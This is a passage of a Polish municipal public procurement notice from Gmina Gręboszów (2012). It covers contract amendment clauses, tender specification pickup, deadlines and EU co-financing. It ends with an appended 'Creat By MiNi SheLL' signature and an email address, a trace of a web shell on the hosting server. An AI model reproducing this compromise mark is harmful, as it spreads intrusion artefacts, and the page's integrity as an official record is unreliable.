c) roboty zamienne będą wykonywane przy zachowaniu nie pogorszonych norm, standardów  i parametrów.  
              d) rezygnacja przez Zamawiającego z realizacji części robót będącej przedmiotem  umowy. W takim przypadku 
                  wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym  Zamawiający zapłaci za  
                  wykonane  roboty, które Wykonawca wykonał w oparciu o bazę cen z przetargu, po ich uprzednim 
                  zinwentaryzowaniu.
3)	Zmiany osobowe;
a) Zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne 
     legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa 
     w ustawie Prawo budowlane lub innych ustawach, 
b)  Zmiana podwykonawców,
              c)  Zmiana inspektora nadzoru lub przedstawicieli ze strony Zamawiającego do realizacji umowy.
           4)     Zmiana procentowa stawki podatku od towarów i usług VAT. W takim przypadku umowa ulegnie 
                   zmianie  w zakresie wysokości ceny brutto wynagrodzenia.
           5)    Zmiana umożliwiająca usunięcie rozbieżności  lub niejasności w rozumieniu pojęć użytych 
                   w umowie w celu jej doprecyzowania i   jednoznacznej interpretacji  jej zapisów przez strony. 


       
            6)  Zaistnienia innych niemożliwych do przewidzenia w momencie zawarcia umowy okoliczności
                    prawnej, ekonomicznej lub technicznej,   za którą żadna ze Stron nie ponosi odpowiedzialności, 
                    skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze SIWZ - Zamawiający 
                  dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl/root_BIP/BIP_w_Malopolsce/gminy/root_Greboszow zamowienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gręboszów 144, pokój nr 2 lub za pośrednictwem pocztowym po uprzednim złożeniu wniosku, nie później niż 6 dni przed terminem otwarcia ofert. Cena 200 zł + 23 % VAT.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2012 godzina 10:00, miejsce: Urząd Gminy Gręboszów, Gręboszów 144, pokój nr 1 (piętro) - w sekretariacie Urzędu Gminy Gręboszów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich objętego PROW na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com